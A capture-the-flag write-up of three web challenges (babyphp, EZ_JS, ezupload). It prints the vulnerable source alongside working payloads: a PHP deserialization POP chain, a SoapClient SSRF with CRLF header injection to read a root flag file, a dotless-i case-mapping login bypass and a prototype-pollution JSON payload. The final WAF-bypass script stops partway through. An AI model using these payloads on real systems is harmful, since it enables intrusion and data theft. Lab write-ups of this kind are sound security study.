
babyphp

index.php:

```php
<?php
//something in flag.php
class A
{
    public $a;
    public $b;
    public function __wakeup()
    {
        $this->a='babyhacker';
    }
    public function __invoke()
    {
        if (isset($this->a) && $this->a==md5($this->a)) {
            $this->b->uwant();
        }
    }
}
class B
{
    public $a;
    public $b;
    public $k;
    function __destruct()
    {
        $this->b=$this->k;
        die($this->a);
    }
}
class C
{
    public $a;
    public $c;
    public function __toString()
    {
        $cc=$this->c;
        return $cc();
    }
    public function uwant()
    {
        if ($this->a=='phpinfo') {
            phpinfo();
        } else {
            call_user_func(array(reset($_SESSION), $this->a));
        }
    }
}
if (isset($_GET['d0g3'])) {
    ini_set($_GET['baby'], $_GET['d0g3']);
    session_start();
    $_SESSION['sess']=$_POST['sess'];
}
else{
    session_start();
    if (isset($_POST['pop'])) {
        unserialize($_POST['pop']);
    }
}
var_dump($_SESSION);
highlight_file(__FILE__);
```

flag.php:

```php
<?php
session_start();
highlight_file(__FILE__);
//flag in the root directory
if($_SERVER['REMOTE_ADDR']==='127.0.0.1'){
    $f1ag=implode(array(new $_GET['a']($_GET['b'])));
    $_SESSION['F1AG']=$f1ag;
}else{
    echo 'only localhost!';
}
```

Constructing a POP chain that reaches phpinfo() shows that session.serialize_handler is php; combined with the source of flag.php, the guess is that a SoapClient deserialized from the session is meant to be used for SSRF.

The idea: first use the attacker-controlled ini_set() to set session.serialize_handler to php_serialize and pass the serialized SoapClient as the sess parameter, so it is written into the session under that handler; then request the page once with no GET or POST parameters, so the session is read back under the default php handler and the SoapClient is deserialized; finally use the POP chain above to invoke SoapClient's __call method, which triggers the SSRF.

The SSRF target is flag.php, whose new $_GET['a']($_GET['b']) is first used with PHP's native GlobIterator class to list files starting with f in the root directory, then with SplFileObject to read the flag.

pop chain payload:

```php
<?php
class A
{
    public $a;
    public $b;
}
class B
{
}
class C
{
    public $a;
    public $c;
}
$cc=new C();
$cc->a='xxxx';
$a=new A();
$a->a='0e215962017';
$a->b=$cc;
$c=new C();
$c->c=$a;
$b=new B();
$b->a=$c;
echo serialize($b);
```

ssrf payload:

```php
<?php
//$a=new SoapClient(null,array('location'=>'http://127.0.0.1/flag.php?a=GlobIterator&b=/f*', 'user_agent'=>"111\r\nCookie: PHPSESSID=c9urdtg4kjp5jl36mrl44qlsah", 'uri'=>'test'));
$a=new SoapClient(null,array('location'=>'http://127.0.0.1/flag.php?a=SplFileObject&b=/f1111lllllllaagg', 'user_agent'=>"111\r\nCookie: PHPSESSID=c9urdtg4kjp5jl36mrl44qlsah", 'uri'=>'test'));
$b=serialize($a);
echo '|'.urlencode($b);
```

Use GlobIterator first

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271930808.png

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271931449.png

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271934414.png

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271935912.png

Then SplFileObject

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271936690.png

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271936090.png

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271938787.png

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271938294.png

EZ_JS

The login page accepts any account and password, then redirects to the /cookie route; viewing the page source there shows a JSFuck comment which, decoded, hints at uppercase input.

The source of the home page contains the following comment:

```html
<!--This secret is 7 characters long for security!
hash=md5(secret+'flag');//1946714cfa9deb70cc40bab32872f98a
admin cookie is md5(secret+urldecode('flag%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00X%00%00%00%00%00%00%00dog'));
-->
```

At a glance this is a hash length extension attack.

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271942270.png

Changing the cookie hash directly turned out to be useless; then, with the userid left empty, an error was returned.

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271943926.png

Combined with the earlier hint, the trick is JavaScript's Unicode case mapping: the dotless i uppercases to an ASCII I:

```javascript
'ı'.toUpperCase()=='I' //true
```

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271944110.png
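As an added example (not code from the writeup), here is the kind of identity check that becomes bypassable when toUpperCase() runs before the comparison, a hardened version that rejects non-ASCII input before any case conversion, and an audit helper that lists the BMP characters whose uppercase form collapses onto an ASCII letter; the function names are assumptions.

```javascript
// Added example, not the challenge's code. Shows why deciding privileges on
// a case-converted name is unsafe when the input may contain non-ASCII.

// Unsafe canonicalisation: "adm\u0131n" (dotless i) is not "admin" before
// the conversion, but becomes "ADMIN" after it.
function canonicalUnsafe(name) {
  return name.toUpperCase();
}

// Hardened: refuse anything outside printable ASCII first, so Unicode
// case-mapping collisions never reach the comparison. Returns null on reject.
function canonicalSafe(name) {
  if (!/^[\x20-\x7e]+$/.test(name)) return null;
  return name.toUpperCase();
}

// The privilege decision itself, made on the canonical form.
function isAdmin(canon) {
  return canon === 'ADMIN';
}

// Audit helper for defenders: non-ASCII BMP characters whose toUpperCase()
// is a single ASCII letter, i.e. the inputs a case-folding check must refuse.
function asciiUpperCollisions() {
  const out = [];
  for (let cp = 0x80; cp < 0x10000; cp++) {
    const ch = String.fromCharCode(cp);
    const up = ch.toUpperCase();
    if (up.length === 1 && up >= 'A' && up <= 'Z') out.push([ch, up]);
  }
  return out;
}
```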

This redirects to /infoflllllag (the static environment resets every 30 minutes, so the screenshot above was taken on an earlier instance). Its source:

```javascript
var express=require('express');
var router=express.Router();

const isObject=obj=>obj && obj.constructor && obj.constructor===Object;

const merge=(a, b)=>{
    for (var attr in b) {
        if (isObject(a[attr]) && isObject(b[attr])) {
            merge(a[attr], b[attr]);
        } else {
            a[attr]=b[attr];
        }
    }
    return a;
}

const clone=(a)=>{
    return merge({}, a);
}

router.get('/', function(req, res, next) {
    if(req.flag=='flag'){
        //Output flag;
        res.send('flag???');
    }
    res.render('info');
});

router.post('/', express.json(),function(req, res) {
    var str=req.body.id;
    var obj=JSON.parse(str);
    req.cookies.id=clone(obj);
    res.render('info');
});

module.exports=router;
```

Clearly the flag attribute of req has to be set by polluting the prototype chain through merge(). The payload is as follows:

```
id={'__proto__':+{'flag':+'flag'}}
```

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271947808.png

Then switch to a GET request to read the flag

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271948522.png

Screenshot of the static target machine

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271948518.png
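As an added example (not the challenge's code), the merge() from the source above beside a hardened version, with a check that shows the posted payload pollutes Object.prototype through the first but not the second; mergeUnsafe, mergeSafe and pollutes are assumed names and the JSON body is constructed.

```javascript
// Added example, not the challenge's code.
const isObject = (obj) => obj && obj.constructor && obj.constructor === Object;

// Vulnerable (same logic as the route above): for..in reaches the own
// "__proto__" key JSON.parse created, a["__proto__"] is Object.prototype,
// and the recursion writes attacker keys onto it.
function mergeUnsafe(a, b) {
  for (const attr in b) {
    if (isObject(a[attr]) && isObject(b[attr])) {
      mergeUnsafe(a[attr], b[attr]);
    } else {
      a[attr] = b[attr];
    }
  }
  return a;
}

const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);

// Hardened: own keys only, never the prototype-reaching names, and nested
// objects are only merged into objects the target itself owns.
function mergeSafe(a, b) {
  for (const attr of Object.keys(b)) {
    if (FORBIDDEN.has(attr)) continue;
    const own = Object.prototype.hasOwnProperty.call(a, attr);
    if (isObject(b[attr]) && own && isObject(a[attr])) {
      mergeSafe(a[attr], b[attr]);
    } else if (isObject(b[attr])) {
      a[attr] = mergeSafe({}, b[attr]);
    } else {
      a[attr] = b[attr];
    }
  }
  return a;
}

// Runs one merge over a constructed request body and reports whether a
// brand-new object now inherits "flag"; cleans up so the check is repeatable.
function pollutes(mergeFn) {
  const body = JSON.parse('{"__proto__": {"flag": "flag"}, "id": 1}'); // constructed
  mergeFn({}, body);
  const leaked = ({}).flag === 'flag';
  delete Object.prototype.flag;
  return leaked;
}
```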

ezupload

Upload phpinfo first

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271949581.png

PHP 8.0.1; disable_functions blocks a long list, but file_get_contents() is available, so the challenge source is read through it:

```php
<html>
<body>
<form method="POST" enctype="multipart/form-data">
This front end is not beautiful!
<input type="file" name="upload_file" />
<input type="submit" name="submit" value="submit" />
</form>
</body>
</html>
<?php
function waf($var): bool{
    $blacklist=['\$_', 'eval','copy' ,'assert','usort','include', 'require', '$', '^', '~', '-', '%', '*','file','fopen','fwriter','fput','copy','curl','fread','fget','function_exists','dl','putenv','system','exec','shell_exec','passthru','proc_open','proc_close', 'proc_get_status','checkdnsrr','getmxrr','getservbyname','getservbyport','syslog','popen','show_source','highlight_file','`','chmod'];
    foreach($blacklist as $blackword){
        if(strstr($var, $blackword)) return True;
    }
    return False;
}
error_reporting(0);
//Set Upload Directory
define('UPLOAD_PATH', './uploads');
$msg='Upload Success!';
if (isset($_POST['submit'])) {
    $temp_file=$_FILES['upload_file']['tmp_name'];
    $file_name=$_FILES['upload_file']['name'];
    $ext=pathinfo($file_name,PATHINFO_EXTENSION);
    if(!preg_match('/php/i', strtolower($ext))){
        die("I don't want pictures, Xiong Da");
    }
    $content=file_get_contents($temp_file);
    if(waf($content)){
        die('Oh, what are you doing, little heizi.');
    }
    $new_file_name=md5($file_name).'.'.$ext;
    $img_path=UPLOAD_PATH . '/' . $new_file_name;
    if (move_uploaded_file($temp_file, $img_path)){
        $is_upload=true;
    } else {
        $msg='Upload Failed!';
        die();
    }
    echo $msg.' '.$img_path;
}
```

The bitwise operator | is not filtered. Taking | as the example, GlobIterator is used to find the flag:

```python
import re

preg = r'\*'

# Percent-encode one byte value, zero-padded to two hex digits
def convertToURL(s):
    if s < 16:
        return '%0' + str(hex(s).replace('0x', ''))
    else:
        return '%' + str(hex(s).replace('0x', ''))
```
